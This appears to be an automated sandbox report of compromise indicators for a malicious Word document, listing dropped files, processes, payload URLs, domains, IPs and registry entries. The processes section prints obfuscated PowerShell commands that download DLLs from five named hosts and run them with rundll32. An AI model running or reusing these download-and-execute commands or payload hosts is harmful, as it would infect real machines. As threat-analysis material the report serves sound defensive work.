IOCReport

loading gif

Files

File Path
Type
Category
Malicious
diagram-884.doc
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: x, Template: Normal.dotm, Last Saved By: x, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 16 10:44:00 2021, Last Saved Time/Date: Thu Sep 16 10:44:00 2021, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0
initial sample
malicious
C:\ProgramData\pin.vbs
ASCII text, with CRLF line terminators
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1960F7F0-F768-4A99-BA9A-679D126DC5D5}.tmp
data
dropped
clean
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\diagram-884.LNK
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Mon Aug 30 20:08:58 2021, mtime=Mon Aug 30 20:08:58 2021, atime=Thu Sep 16 22:58:17 2021, length=286720, window=hide
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
ASCII text, with CRLF line terminators
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2EZUU6Z1EEHNESJOJTGM.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msar (copy)
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GRS1X41I3E0W4529WXKM.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RVAC7IF4RL0ITUO02ZRM.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T629K64P5Q872I06B2KO.temp
data
dropped
clean
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\W3V0CVJZ98SWKPVTWYZJ.temp
data
dropped
clean
C:\Users\user\Desktop\~$agram-884.doc
data
dropped
clean
There are 6 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
malicious
C:\Windows\System32\cmd.exe
cmd /k cscript.exe C:\ProgramData\pin.vbs
malicious
C:\Windows\System32\cscript.exe
cscript.exe C:\ProgramData\pin.vbs
malicious
C:\Windows\System32\cmd.exe
'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www1.dll,ldr
malicious
C:\Windows\System32\cmd.exe
'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www2.dll,ldr
malicious
C:\Windows\System32\cmd.exe
'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www3.dll,ldr
malicious
C:\Windows\System32\cmd.exe
'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www4.dll,ldr
malicious
C:\Windows\System32\cmd.exe
'C:\Windows\System32\cmd.exe' /c rundll32.exe C:\ProgramData\www5.dll,ldr
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nano='JOOEX'.replace('JOO','I');sal OY $Nano;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://gvmedicine.com/c8lDPI7K/ca.html'',''C:\ProgramData\www1.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoz='JOOEX'.replace('JOO','I');sal OY $Nanoz;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html'',''C:\ProgramData\www2.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanox='JOOEX'.replace('JOO','I');sal OY $Nanox;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://srdm.in/0K6dTttd/ca.html'',''C:\ProgramData\www3.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://sharayuprakashan.com/90qJEVeD0VAw/ca.html'',''C:\ProgramData\www4.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;
clean
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' $Nanoc='JOOEX'.replace('JOO','I');sal OY $Nanoc;$aa='(New-Ob'; $qq='ject Ne'; $ww='t.WebCli'; $ee='ent).Downl'; $rr='oadFile'; $bb='(''https://venturefiling.com/yP2brxfli/ca.html'',''C:\ProgramData\www5.dll'')';$FOOX =($aa,$qq,$ww,$ee,$rr,$bb,$cc -Join ''); OY $FOOX|OY;
clean
C:\Windows\System32\rundll32.exe
rundll32.exe C:\ProgramData\www1.dll,ldr
clean
C:\Windows\System32\rundll32.exe
rundll32.exe C:\ProgramData\www2.dll,ldr
clean
C:\Windows\System32\rundll32.exe
rundll32.exe C:\ProgramData\www3.dll,ldr
clean
C:\Windows\System32\rundll32.exe
rundll32.exe C:\ProgramData\www4.dll,ldr
clean
C:\Windows\System32\rundll32.exe
rundll32.exe C:\ProgramData\www5.dll,ldr
clean
There are 8 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.html
149.56.235.225
malicious
https://scriptcaseblog.com.br/8KhqnNaE4UB/ca.htmlPE
unknown
malicious
http://www.windows.com/pctv.
unknown
clean
http://investor.msn.com
unknown
clean
http://www.msnbc.com/news/ticker.txt
unknown
clean
https://scriptcaseblog.com.br/
unknown
clean
https://scriptcaseblog.com.br
unknown
clean
http://crl.entrust.net/server1.crl0
unknown
clean
https://srdm.in/0K6dTttd/ca.html
192.185.115.199
clean
http://ocsp.entrust.net03
unknown
clean
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
unknown
clean
http://www.diginotar.nl/cps/pkioverheid0
unknown
clean
https://gvmedicine.com/c8lDPI
unknown
clean
https://sharayuprakashan.com/90qJEVeD0VAw/ca.html
204.11.58.87
clean
http://windowsmedia.com/redir/services.asp?WMPFriendly=true
unknown
clean
http://www.hotmail.com/oe
unknown
clean
https://gvmedicine.com/c8lDPI7K/ca.html
204.11.58.87
clean
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
unknown
clean
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
unknown
clean
http://www.icra.org/vocabulary/.
unknown
clean
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
unknown
clean
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
unknown
clean
https://gvmedicine.com/c8lDPI7K/
unknown
clean
http://investor.msn.com/
unknown
clean
https://gvmedicine.com/c8lDPI7K/ca.htmlPE
unknown
clean
http://www.piriform.com/ccleaner
unknown
clean
http://www.%s.comPA
unknown
clean
http://ocsp.entrust.net0D
unknown
clean
https://gvmedicine.com/c8lDPI7
unknown
clean
https://secure.comodo.com/CPS0
unknown
clean
http://servername/isapibackend.dll
unknown
clean
http://crl.entrust.net/2048ca.crl0
unknown
clean
https://scriptcaseblog.com.br/8K
unknown
clean
https://venturefiling.com/yP2brxfli/ca.html
204.11.58.87
clean
http://www.piriform.com/ccleanerhttp://w
unknown
clean
https://gvmedicine.com
unknown
clean
There are 26 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
gvmedicine.com
204.11.58.87
clean
srdm.in
192.185.115.199
clean
scriptcaseblog.com.br
149.56.235.225
clean
sharayuprakashan.com
204.11.58.87
clean
venturefiling.com
204.11.58.87
clean

IPs

IP
Domain
Country
Malicious
149.56.235.225
scriptcaseblog.com.br
Canada
clean
204.11.58.87
gvmedicine.com
United States
clean
192.185.115.199
srdm.in
United States
clean

Registry

Path
Value
Malicious
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
y)-
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
MTTT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
r*-
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
{+-
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
VBAFiles
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
ReviewToken
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
2E475
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
NULL
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@Arial Unicode MS
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@Batang
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@BatangChe
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@DFKai-SB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@Dotum
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@DotumChe
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@FangSong
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@Gulim
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@GulimChe
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@Gungsuh
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@GungsuhChe
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@KaiTi
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@Malgun Gothic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@Meiryo
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@Meiryo UI
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@Microsoft JhengHei
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@Microsoft YaHei
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@MingLiU
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@MingLiU_HKSCS
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@MingLiU_HKSCS-ExtB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@MingLiU-ExtB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@MS Gothic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@MS Mincho
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@MS PGothic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@MS PMincho
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@MS UI Gothic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@NSimSun
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@PMingLiU
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@PMingLiU-ExtB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@SimHei
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@SimSun
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
@SimSun-ExtB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Agency FB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Aharoni
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Algerian
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Andalus
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Angsana New
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
AngsanaUPC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Aparajita
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Arabic Typesetting
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Arial
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Arial Black
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Arial Narrow
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Arial Rounded MT Bold
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Arial Unicode MS
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Baskerville Old Face
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Batang
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
BatangChe
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bauhaus 93
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bell MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Berlin Sans FB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Berlin Sans FB Demi
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bernard MT Condensed
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Blackadder ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bodoni MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bodoni MT Black
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bodoni MT Condensed
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bodoni MT Poster Compressed
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Book Antiqua
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bookman Old Style
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bookshelf Symbol 7
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Bradley Hand ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Britannic Bold
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Broadway
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Browallia New
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
BrowalliaUPC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Brush Script MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Calibri
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Calibri Light
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Californian FB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Calisto MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Cambria
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Cambria Math
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Candara
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Castellar
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Centaur
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Century
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Century Gothic
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Century Schoolbook
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Chiller
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Colonna MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Comic Sans MS
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Consolas
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Constantia
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Cooper Black
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Copperplate Gothic Bold
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Copperplate Gothic Light
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Corbel
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Cordia New
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
CordiaUPC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Courier New
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Curlz MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
DaunPenh
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
David
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
DFKai-SB
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
DilleniaUPC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
DokChampa
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Dotum
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
DotumChe
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Ebrima
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Edwardian Script ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Elephant
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Engravers MT
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Eras Bold ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Eras Demi ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Eras Light ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Eras Medium ITC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Estrangelo Edessa
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
EucrosiaUPC
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Euphemia
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
FangSong
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Felix Titling
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Footlight MT Light
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Forte
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Franklin Gothic Book
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Franklin Gothic Demi
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Franklin Gothic Demi Cond
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Franklin Gothic Heavy
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Franklin Gothic Medium
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Franklin Gothic Medium Cond
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
FrankRuehl
clean
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
FreesiaUPC
clean
